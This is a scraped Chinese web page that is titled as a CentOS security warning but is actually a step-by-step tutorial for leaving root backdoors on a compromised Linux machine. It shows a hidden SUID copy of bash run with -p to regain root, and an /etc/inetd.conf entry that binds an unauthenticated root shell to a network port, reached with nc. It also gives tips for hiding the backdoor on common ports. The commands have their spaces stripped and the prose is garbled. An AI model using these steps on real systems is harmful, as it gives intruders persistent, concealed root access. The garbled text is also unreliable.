<fieldset id='sde4j'></fieldset><dl id='sde4j'></dl>
  1. <tr id='sde4j'><strong id='sde4j'></strong><small id='sde4j'></small><button id='sde4j'></button><li id='sde4j'><noscript id='sde4j'><big id='sde4j'></big><dt id='sde4j'></dt></noscript></li></tr><ol id='sde4j'><table id='sde4j'><blockquote id='sde4j'><tbody id='sde4j'></tbody></blockquote></table></ol><u id='sde4j'></u><kbd id='sde4j'><kbd id='sde4j'></kbd></kbd>

    <code id='sde4j'><strong id='sde4j'></strong></code>
      1. <i id='sde4j'></i>

        1. <acronym id='sde4j'><em id='sde4j'></em><td id='sde4j'><div id='sde4j'></div></td></acronym><address id='sde4j'><big id='sde4j'><big id='sde4j'></big><legend id='sde4j'></legend></big></address>

          <ins id='sde4j'></ins>

        2. <span id='sde4j'></span><i id='sde4j'><div id='sde4j'><ins id='sde4j'></ins></div></i>

          CentOS小心被suid shell与inetd后门利用的详细讲解

          • 时间:
          • 浏览:7
          • 来源:124软件资讯网

              CentOS小心被suid shell与inetd后门使用的详细解说

            你现在已经是root用户  ,想留一个后门 。

              系统情况:

              dawg:~#uname-a

              Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

              1.SUIDshell

              首先,先切换成为root用户  ,并执行以下的下令:

              dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

              固然,你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你  ,一定能想出许多好的名字的  。文件前面的那一点也不是须要的 ,只是为了隐藏文件(在文件名的最前面加上“.”  ,就可以在恣意文件目录下举行隐藏).

              现在  ,做为一个通俗用户 ,我们来启用这个后门:

              fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

              为什么不行呢?

              由于bash2针对suid有一些护卫的措施.但这也不是不行破的:

              .woot-2.05b$/.woot-p

              .woot-2.05b#id

              uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

              使用-p参数来获取一个rootshell.这个euid的意思是effectiveuserid(关于这些ID的知识 ,可以戳这里)

              这里要特殊注重的是 ,作为一个通俗用户执行这个SUIDshell时  ,一定要使用全路径  。

              小知识:

              怎样查找那些具有SUID的文件:

              dawg:~#find/-perm+4000-ls

              这时就会返回具有SUID位的文件啦  。

              2.远程后门:使用/etc/inetd.conf

              我们使用vi来修改/etc/inetd.conf文件

              原文件:

              #chargendgramudpwaitrootinternal

              #discardstreamtcpnowaitrootinternal

              #discarddgramudpwaitrootinternal

              #daytimestreamtcpnowaitrootinternal

              修改为:

              #discardstreamtcpnowaitrootinternal

              #discarddgramudpwaitrootinternal

              daytimestreamtcpnowaitroot/bin/bashbash-i

              开启inetd:

              dawg:~#inetd

              若是要强制重启inetd:

              dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

              现在我们就可以用nc来爆菊了:

              C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

              (UNKNOWN)[192.168.1.77]13(daytime)open

              bash:nojobcontrolinthisshell

              bash-2.05b#bash-2.05b#

              bash-2.05b#iduid=0(root)

              gid=0(root)groups=0(root)bash-2.05b#uname-a

              Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

              小贴士:

              我们可以修改/etc/services文件  ,加入以下的工具:

              woot6666/tcp#evilbackdoorservice

              然后修改/etc/inetd.conf:

              wootstreamtcpnowaitroot/bin/bashbash-i

              我们可以修改成一些常见的端口  ,以实现隐藏  。